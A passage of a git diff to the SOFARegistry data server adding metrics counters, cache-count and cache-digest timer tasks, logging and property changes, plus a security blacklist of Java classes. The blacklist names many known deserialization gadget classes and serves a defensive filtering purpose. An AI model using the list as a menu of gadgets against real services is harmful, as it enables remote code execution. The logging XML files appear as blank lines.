SYNC_LEADER_PUB_COUNTER = + Counter.build() + .namespace("data") + .subsystem("sync") + .name("leader_pub_total") + .help("count sync leader pubs") + .labelNames("slot") + .register(); + + private static final Counter SYNC_LEADER_PUB_NUM_COUNTER = + Counter.build() + .namespace("data") + .subsystem("sync") + .name("leader_pub_num_total") + .help("count sync leader pub's num") + .labelNames("slot") + .register(); + + static void observeSyncLeaderId(int slotId, int idNum) { + final String str = String.valueOf(slotId); + SYNC_LEADER_ID_COUNTER.labels(str).inc(); + SYNC_LEADER_ID_NUM_COUNTER.labels(str).inc(idNum); + } + + static void observeSyncLeaderPub(int slotId, int pubNum) { + final String str = String.valueOf(slotId); + SYNC_LEADER_PUB_COUNTER.labels(str).inc(); + SYNC_LEADER_PUB_NUM_COUNTER.labels(str).inc(pubNum); + } + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/slot/SyncContinues.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/slot/SyncContinues.java new file mode 100644 index 000000000..e4db7a3ce --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/slot/SyncContinues.java @@ -0,0 +1,21 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.slot; + +public interface SyncContinues { + boolean continues(); +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/timer/CacheCountTask.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/timer/CacheCountTask.java new file mode 100644 index 000000000..ffd7aed99 --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/timer/CacheCountTask.java @@ -0,0 +1,146 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.timer; + +import com.alipay.sofa.registry.common.model.DataUtils; +import com.alipay.sofa.registry.common.model.Tuple; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import com.alipay.sofa.registry.server.data.cache.DatumCache; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.alipay.sofa.registry.util.NamedThreadFactory; +import com.google.common.annotations.VisibleForTesting; +import java.util.ArrayList; +import java.util.List; +import java.util.Map; +import java.util.Map.Entry; +import java.util.concurrent.ScheduledExecutorService; +import java.util.concurrent.ScheduledThreadPoolExecutor; +import java.util.concurrent.TimeUnit; +import javax.annotation.PostConstruct; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author qian.lqlq + * @version $Id: CacheDigestTask.java, v 0.1 2018-04-27 17:40 qian.lqlq Exp $ + */ +public class CacheCountTask { + private static final Logger LOGGER = + LoggerFactory.getLogger(CacheCountTask.class, "[CacheCountTask]"); + private static final Logger COUNT_LOGGER = LoggerFactory.getLogger("CACHE-COUNT"); + + @Autowired private DatumCache datumCache; + + @Autowired private DataServerConfig dataServerConfig; + + @PostConstruct + public boolean init() { + final int intervalSec = dataServerConfig.getCacheCountIntervalSecs(); + if (intervalSec <= 0) { + LOGGER.info("cache count off with intervalSecs={}", intervalSec); + return false; + } + ScheduledExecutorService executor = + new ScheduledThreadPoolExecutor(1, new NamedThreadFactory("CacheCountTask")); + executor.scheduleWithFixedDelay(() -> count(), intervalSec, intervalSec, TimeUnit.SECONDS); + return true; + } + + boolean count() { + try { + Map>> allMap = datumCache.getAllPublisher(); + if (!allMap.isEmpty()) { + for (Entry>> dataCenterEntry : allMap.entrySet()) { + final String dataCenter = dataCenterEntry.getKey(); + List all = new ArrayList<>(512); + for (List publishers : dataCenterEntry.getValue().values()) { + all.addAll(publishers); + } + Map>> groupCounts = + DataUtils.countGroupByInstanceIdGroup(all); + printGroupCount(dataCenter, groupCounts); + + Map>>> counts = + DataUtils.countGroupByInstanceIdGroupApp(all); + printGroupAppCount(dataCenter, counts); + } + } else { + LOGGER.info("datum cache is empty"); + } + return true; + } catch (Throwable t) { + LOGGER.error("cache count error", t); + } + return false; + } + + private static void printGroupAppCount( + String dataCenter, Map>>> counts) { + for (Entry>>> count : + counts.entrySet()) { + final String instanceId = count.getKey(); + for (Entry>> groupCounts : + count.getValue().entrySet()) { + final String group = groupCounts.getKey(); + for (Entry> apps : groupCounts.getValue().entrySet()) { + final String app = apps.getKey(); + Tuple tupleCount = apps.getValue(); + COUNT_LOGGER.info( + "[Pub]{},{},{},{},{},{}", + dataCenter, + instanceId, + group, + app, + tupleCount.o1, + tupleCount.o2); + } + ConcurrentUtils.sleepUninterruptibly(100, TimeUnit.MILLISECONDS); + } + } + } + + private static void printGroupCount( + String dataCenter, Map>> counts) { + for (Map.Entry>> count : counts.entrySet()) { + final String instanceId = count.getKey(); + Map> groupCounts = count.getValue(); + for (Entry> groupCount : groupCounts.entrySet()) { + final String group = groupCount.getKey(); + Tuple tupleCount = groupCount.getValue(); + COUNT_LOGGER.info( + "[PubGroup]{},{},{},{},{}", + dataCenter, + instanceId, + group, + tupleCount.o1, + tupleCount.o2); + } + } + } + + @VisibleForTesting + void setDatumCache(DatumCache datumCache) { + this.datumCache = datumCache; + } + + @VisibleForTesting + void setDataServerConfig(DataServerConfig dataServerConfig) { + this.dataServerConfig = dataServerConfig; + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/timer/CacheDigestTask.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/timer/CacheDigestTask.java new file mode 100644 index 000000000..30841f7ef --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/timer/CacheDigestTask.java @@ -0,0 +1,134 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.timer; + +import com.alipay.sofa.registry.common.model.dataserver.Datum; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import com.alipay.sofa.registry.server.data.cache.DatumCache; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.alipay.sofa.registry.util.StringFormatter; +import com.google.common.annotations.VisibleForTesting; +import java.util.*; +import java.util.Map.Entry; +import java.util.concurrent.TimeUnit; +import javax.annotation.PostConstruct; +import org.apache.commons.lang.time.DateUtils; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.util.CollectionUtils; + +/** + * @author qian.lqlq + * @version $Id: CacheDigestTask.java, v 0.1 2018-04-27 17:40 qian.lqlq Exp $ + */ +public class CacheDigestTask { + private static final Logger LOGGER = LoggerFactory.getLogger("CACHE-DIGEST"); + + @Autowired private DatumCache datumCache; + + @Autowired private DataServerConfig dataServerConfig; + + @PostConstruct + public boolean init() { + final int intervalMinutes = dataServerConfig.getCacheDigestIntervalMinutes(); + if (intervalMinutes <= 0) { + LOGGER.info("cache digest off with intervalMinutes={}", intervalMinutes); + return false; + } + Date firstDate = new Date(); + firstDate = DateUtils.round(firstDate, Calendar.MINUTE); + firstDate.setMinutes( + firstDate.getMinutes() / intervalMinutes * intervalMinutes + intervalMinutes); + Timer timer = new Timer("CacheDigestTask", true); + TimerTask task = + new TimerTask() { + @Override + public void run() { + dump(); + } + }; + timer.scheduleAtFixedRate(task, firstDate, intervalMinutes * 60 * 1000); + return true; + } + + boolean dump() { + try { + Map> allMap = datumCache.getAll(); + if (!allMap.isEmpty()) { + for (Entry> dataCenterEntry : allMap.entrySet()) { + String dataCenter = dataCenterEntry.getKey(); + Map datumMap = dataCenterEntry.getValue(); + LOGGER.info("size of datum in {} is {}", dataCenter, datumMap.size()); + for (Entry dataInfoEntry : datumMap.entrySet()) { + String dataInfoId = dataInfoEntry.getKey(); + Datum data = dataInfoEntry.getValue(); + Map pubMap = data.getPubMap(); + StringBuilder pubStr = new StringBuilder(4096); + if (!CollectionUtils.isEmpty(pubMap)) { + for (Publisher publisher : pubMap.values()) { + pubStr.append(logPublisher(publisher)).append(";"); + } + } + LOGGER.info( + "[Datum]{},{},{},[{}]", + dataInfoId, + data.getVersion(), + dataCenter, + pubStr.toString()); + // avoid io is busy + ConcurrentUtils.sleepUninterruptibly(2, TimeUnit.MILLISECONDS); + } + int pubCount = datumMap.values().stream().mapToInt(Datum::publisherSize).sum(); + LOGGER.info("size of publisher in {} is {}", dataCenter, pubCount); + } + } else { + LOGGER.info("datum cache is empty"); + } + return true; + } catch (Throwable t) { + LOGGER.error("cache digest error", t); + } + return false; + } + + private String logPublisher(Publisher publisher) { + if (publisher != null) { + URL url = publisher.getSourceAddress(); + String urlStr = url != null ? url.getAddressString() : "null"; + return StringFormatter.format( + "{},{},{},{}", + publisher.getRegisterId(), + publisher.getRegisterTimestamp(), + urlStr, + publisher.getVersion()); + } + return ""; + } + + @VisibleForTesting + void setDatumCache(DatumCache datumCache) { + this.datumCache = datumCache; + } + + @VisibleForTesting + void setDataServerConfig(DataServerConfig dataServerConfig) { + this.dataServerConfig = dataServerConfig; + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/util/DelayItem.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/util/DelayItem.java deleted file mode 100644 index 07df17fa5..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/util/DelayItem.java +++ /dev/null @@ -1,90 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.util; - -import java.util.concurrent.Delayed; -import java.util.concurrent.TimeUnit; -import java.util.concurrent.atomic.AtomicLong; - -/** - * - * @author shangyu.wh - * @version $Id: DelayItem.java, v 0.1 2018-03-08 15:37 shangyu.wh Exp $ - */ -public class DelayItem implements Delayed { - - private static final AtomicLong SEQUENCER = new AtomicLong(0); - private final long sequenceNumber; - private final T item; - - private final long time; - - /** - * constructor - * @param submit - * @param timeout - */ - public DelayItem(T submit, long timeout) { - this.time = now() + timeout; - this.item = submit; - this.sequenceNumber = SEQUENCER.getAndIncrement(); - } - - /** - * get current time - * @return - */ - static long now() { - return System.currentTimeMillis(); - } - - @Override - public long getDelay(TimeUnit unit) { - return unit.convert(time - now(), TimeUnit.MILLISECONDS); - } - - /** - * Getter method for property item. - * - * @return property value of item - */ - public T getItem() { - return item; - } - - @Override - public int compareTo(Delayed other) { - if (other == this) { - return 0; - } - if (other instanceof DelayItem) { - DelayItem x = (DelayItem) other; - long diff = time - x.time; - if (diff < 0) { - return -1; - } else if (diff > 0) { - return 1; - } else if (sequenceNumber < x.sequenceNumber) { - return -1; - } else { - return 1; - } - } - long d = (getDelay(TimeUnit.MILLISECONDS) - other.getDelay(TimeUnit.MILLISECONDS)); - return (d == 0) ? 0 : ((d < 0) ? -1 : 1); - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/util/LocalServerStatusEnum.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/util/LocalServerStatusEnum.java deleted file mode 100644 index 800eab4fe..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/util/LocalServerStatusEnum.java +++ /dev/null @@ -1,29 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.util; - -/** - * - * @author qian.lqlq - * @version $Id: LocalServerStatusEnum.java, v 0.1 2018-04-29 13:49 qian.lqlq Exp $ - */ -public enum LocalServerStatusEnum { - /** */ - INITIAL, - /** */ - WORKING -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/util/ThreadPoolExecutorDataServer.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/util/ThreadPoolExecutorDataServer.java deleted file mode 100644 index 427e15f4b..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/util/ThreadPoolExecutorDataServer.java +++ /dev/null @@ -1,62 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.util; - -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; - -import java.util.concurrent.BlockingQueue; -import java.util.concurrent.RejectedExecutionException; -import java.util.concurrent.ThreadFactory; -import java.util.concurrent.ThreadPoolExecutor; -import java.util.concurrent.TimeUnit; - -/** - * - * @author shangyu.wh - * @version $Id: ThreadPoolExecutorDataServer.java, v 0.1 2018-10-25 20:40 shangyu.wh Exp $ - */ -public class ThreadPoolExecutorDataServer extends ThreadPoolExecutor { - - private static final Logger LOGGER = LoggerFactory - .getLogger(ThreadPoolExecutorDataServer.class); - - private String executorName; - - public ThreadPoolExecutorDataServer(String executorName, int corePoolSize, int maximumPoolSize, - long keepAliveTime, TimeUnit unit, - BlockingQueue workQueue, - ThreadFactory threadFactory) { - super(corePoolSize, maximumPoolSize, keepAliveTime, unit, workQueue, threadFactory); - this.executorName = executorName; - } - - @Override - public String toString() { - return super.toString() + executorName; - } - - @Override - public void execute(Runnable command) { - try { - super.execute(command); - } catch (RejectedExecutionException e) { - LOGGER.error("Processor session executor {} Rejected Execution!command {}", this, - command.getClass(), e); - } - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/util/TimeUtil.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/util/TimeUtil.java deleted file mode 100644 index 1a6a44ce2..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/util/TimeUtil.java +++ /dev/null @@ -1,46 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.util; - -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; - -import java.util.Random; - -/** - * - * @author qian.lqlq - * @version $Id: TimeUtil.java, v 0.1 2018-03-12 21:05 qian.lqlq Exp $ - */ -public class TimeUtil { - - private static final Logger LOGGER = LoggerFactory.getLogger(TimeUtil.class); - - /** - * random delay some time - * @param max - */ - public static void randomDelay(int max) { - Random random = new Random(); - int randomNum = random.nextInt(max); - try { - Thread.sleep(randomNum); - } catch (InterruptedException e) { - LOGGER.error("[TimeUtil] random delay error", e); - } - } -} \ No newline at end of file diff --git a/server/server/data/src/main/resources/application.properties b/server/server/data/src/main/resources/application.properties index 77c9484d3..9e10ad8ba 100644 --- a/server/server/data/src/main/resources/application.properties +++ b/server/server/data/src/main/resources/application.properties @@ -1,17 +1,22 @@ spring.main.banner-mode=LOG -#nodes.metaNode=: -#nodes.localDataCenter= +nodes.metaNode=DefaultDataCenter:localhost +nodes.localDataCenter=DefaultDataCenter #data.server.logging.level=INFO #data.server.logging.home=/home/admin/logs/registry/data data.server.port=9620 data.server.syncDataPort=9621 data.server.httpServerPort=9622 +data.server.syncSessionPort=9602 data.server.queueCount=4 data.server.queueSize=10240 data.server.notifyIntervalMs=500 +data.server.clientOffDelayMs=1000 +data.server.notifyTempDataIntervalMs=10 data.server.rpcTimeout=3000 data.server.metaServerPort=9611 data.server.storeNodes=3 data.server.numberOfReplicas=1000 +data.server.datumTimeToLiveSec=900 +data.server.sessionDisconnectDelayMs=30000 diff --git a/server/server/data/src/main/resources/log4j2.xml b/server/server/data/src/main/resources/log4j2.xml new file mode 100644 index 000000000..2700d9c5e --- /dev/null +++ b/server/server/data/src/main/resources/log4j2.xml @@ -0,0 +1,281 @@ + + + + + ${user.home}/logs/registry/data + INFO + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/server/server/data/src/main/resources/logback-spring.xml b/server/server/data/src/main/resources/logback-spring.xml deleted file mode 100644 index eab8360d6..000000000 --- a/server/server/data/src/main/resources/logback-spring.xml +++ /dev/null @@ -1,223 +0,0 @@ - - - - - - - - - - - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - - - - - true - - ERROR - - ${DATA_LOG_HOME}/common-error.log - - ${DATA_LOG_HOME}/common-error.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${DATA_LOG_HOME}/common-default.log - - ${DATA_LOG_HOME}/common-default.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${DATA_LOG_HOME}/registry-raft.log - - ${DATA_LOG_HOME}/registry-raft.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${DATA_LOG_HOME}/registry-data.log - - ${DATA_LOG_HOME}/registry-data.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${DATA_LOG_HOME}/registry-startup.log - - ${DATA_LOG_HOME}/registry-startup.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${DATA_LOG_HOME}/datum-change.log - - ${DATA_LOG_HOME}/datum-change.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${DATA_LOG_HOME}/cache-digest.log - - ${DATA_LOG_HOME}/cache-digest.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${DATA_LOG_HOME}/registry-http.log - - ${DATA_LOG_HOME}/registry-http.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/server/server/data/src/main/resources/security/blacklist.txt b/server/server/data/src/main/resources/security/blacklist.txt new file mode 100644 index 000000000..e3413f8d4 --- /dev/null +++ b/server/server/data/src/main/resources/security/blacklist.txt @@ -0,0 +1,78 @@ +org.codehaus.groovy.runtime.MethodClosure +clojure.core$constantly +clojure.main$eval_opt +com.alibaba.citrus.springext.support.parser.AbstractNamedProxyBeanDefinitionParser$ProxyTargetFactory +com.alibaba.citrus.springext.support.parser.AbstractNamedProxyBeanDefinitionParser$ProxyTargetFactoryImpl +com.alibaba.citrus.springext.util.SpringExtUtil.AbstractProxy +com.alipay.custrelation.service.model.redress.Pair +com.caucho.hessian.test.TestCons +com.mchange.v2.c3p0.JndiRefForwardingDataSource +com.mchange.v2.c3p0.WrapperConnectionPoolDataSource +com.rometools.rome.feed.impl.EqualsBean +com.rometools.rome.feed.impl.ToStringBean +com.sun.jndi.rmi.registry.BindingEnumeration +com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl +com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl +com.sun.rowset.JdbcRowSetImpl +com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data +java.rmi.server.UnicastRemoteObject +java.security.SignedObject +java.util.ServiceLoader$LazyIterator +javax.imageio.ImageIO$ContainsFilter +javax.imageio.spi.ServiceRegistry +javax.management.BadAttributeValueExpException +javax.naming.InitialContext +javax.naming.spi.ObjectFactory +javax.script.ScriptEngineManager +javax.sound.sampled.AudioFormat$Encoding +org.apache.carbondata.core.scan.expression.ExpressionResult +org.apache.commons.dbcp +org.apache.commons.dbcp2 +org.apache.commons.beanutils +org.apache.ibatis.executor.loader.AbstractSerialStateHolder +org.apache.ibatis.executor.loader.CglibSerialStateHolder +org.apache.ibatis.executor.loader.JavassistSerialStateHolder +org.apache.ibatis.executor.loader.cglib.CglibProxyFactory +org.apache.ibatis.executor.loader.javassist.JavassistSerialStateHolder +org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource +org.apache.wicket.util.upload.DiskFileItem +org.apache.xalan.xsltc.trax.TemplatesImpl +org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding +org.apache.xpath.XPathContext +org.eclipse.jetty.util.log.LoggerLog +org.geotools.filter.ConstantExpression +org.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder +org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor +org.springframework.beans.factory.BeanFactory +org.springframework.beans.factory.config.PropertyPathFactoryBean +org.springframework.beans.factory.support.DefaultListableBeanFactory +org.springframework.jndi.support.SimpleJndiBeanFactory +org.springframework.orm.jpa.AbstractEntityManagerFactoryBean +org.springframework.transaction.jta.JtaTransactionManager +org.yaml.snakeyaml.tokens.DirectiveToken +sun.rmi.server.UnicastRef +javax.management.ImmutableDescriptor +org.springframework.jndi.JndiObjectTargetSource +ch.qos.logback.core.db.JNDIConnectionSource +java.beans.Expression +javassist.bytecode +javassist.tools.web.Viewer +javassist.util.proxy.SerializedProxy +org.apache.ibatis.javassist.bytecode +org.apache.ibatis.javassist.tools.web.Viewer +org.apache.ibatis.javassist.util.proxy.SerializedProxy +org.springframework.beans.factory.config.MethodInvokingFactoryBean +com.alibaba.druid +com.sun.corba +com.sun.org.apache.bcel +com.sun.org.apache.xml +com.sun.org.apache.xpath +org.apache.zookeeper.Shell +org.apache.tomcat.dbcp.dbcp.BasicDataSource +net.bytebuddy.dynamic.loading.ByteArrayClassLoader +org.jboss.resteasy.plugins +org.springframework.beans.BeanWrapperImpl$BeanPropertyHandler +org.apache.velocity.runtime.resource.Resource +org.springframework.expression.spel.ast.Indexer$PropertyIndexingValueRef +org.mortbay.log.Slf4jLog +org.springframework.expression.spel.ast.MethodReference$MethodValueRef \ No newline at end of file diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/BackupTriadTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/BackupTriadTest.java deleted file mode 100644 index ba4bba93a..000000000 --- a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/BackupTriadTest.java +++ /dev/null @@ -1,84 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data; - -import com.alipay.sofa.registry.common.model.metaserver.DataNode; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; -import com.alipay.sofa.registry.server.data.cache.BackupTriad; -import org.junit.Test; - -import java.util.ArrayList; -import java.util.HashSet; -import java.util.List; -import java.util.Set; - -import static org.junit.Assert.assertEquals; -import static org.junit.Assert.assertFalse; -import static org.junit.Assert.assertTrue; - -/** - * @author xuanbei - * @since 2019/1/16 - */ -public class BackupTriadTest { - @Test - public void doTest() { - List nodeList = new ArrayList<>(); - nodeList.add(new DataNode(new URL("192.168.0.1", 9632), "DefaultDataCenter")); - nodeList.add(new DataNode(new URL("192.168.0.2", 9632), "DefaultDataCenter")); - nodeList.add(new DataNode(new URL("192.168.0.3", 9632), "DefaultDataCenter")); - BackupTriad backupTriad = new BackupTriad("TestDataInfoId", nodeList); - assertFalse(backupTriad.containsSelf()); - - List newTriad = new ArrayList<>(); - newTriad.add(new DataNode(new URL("192.168.0.2", 9632), "DefaultDataCenter")); - newTriad.add(new DataNode(new URL("192.168.0.4", 9632), "DefaultDataCenter")); - Set notWorking = new HashSet<>(); - notWorking.add("192.168.0.2"); - assertEquals(2, backupTriad.getNewJoined(newTriad, notWorking).size()); - assertEquals( - "DataNode{ip=192.168.0.2, dataCenter='DefaultDataCenter', regionId='null', nodeStatus=INIT, registrationTimestamp=0}", - backupTriad.getNewJoined(newTriad, notWorking).get(0).toString()); - assertEquals( - "DataNode{ip=192.168.0.4, dataCenter='DefaultDataCenter', regionId='null', nodeStatus=INIT, registrationTimestamp=0}", - backupTriad.getNewJoined(newTriad, notWorking).get(1).toString()); - - assertEquals("TestDataInfoId", backupTriad.getDataInfoId()); - backupTriad.setDataInfoId("AnotherTestDataInfoId"); - assertEquals("AnotherTestDataInfoId", backupTriad.getDataInfoId()); - - nodeList = new ArrayList<>(); - nodeList.add(new DataNode(new URL("192.168.0.1", 9632), "DefaultDataCenter")); - nodeList.add(new DataNode(new URL(DataServerConfig.IP, 9632), "DefaultDataCenter")); - backupTriad.setTriad(nodeList); - assertTrue(backupTriad.containsSelf()); - assertEquals(2, backupTriad.getTriad().size()); - assertEquals( - "DataNode{ip=192.168.0.1, dataCenter='DefaultDataCenter', regionId='null', nodeStatus=INIT, registrationTimestamp=0}", - backupTriad.getTriad().get(0).toString()); - assertEquals( - "DataNode{ip=" - + DataServerConfig.IP - + ", dataCenter='DefaultDataCenter', regionId='null', nodeStatus=INIT, registrationTimestamp=0}", - backupTriad.getTriad().get(1).toString()); - assertTrue(backupTriad.toString().contains( - "BackupTriad{dataInfoId='AnotherTestDataInfoId', ipSetOfNode=") - && backupTriad.toString().contains("192.168.0.1") - && backupTriad.toString().contains(DataServerConfig.IP)); - } -} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/MigrateTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/MigrateTest.java new file 